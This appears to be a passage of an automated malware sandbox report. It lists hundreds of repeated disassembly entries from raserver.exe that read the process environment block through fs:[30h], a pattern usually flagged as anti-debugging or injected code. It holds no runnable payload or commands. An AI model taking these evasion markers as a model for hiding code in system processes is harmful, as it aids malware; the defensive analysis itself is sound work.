          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04777D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04793D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04808DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04803D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04781DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04781DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04781DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04820EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04820EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04820EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04788E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04798EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04754F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04754F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04768794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04770050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04770050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04824015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04824015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04812073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04821074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04794A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04794A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04773A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04768A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04783B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04783B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04825BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
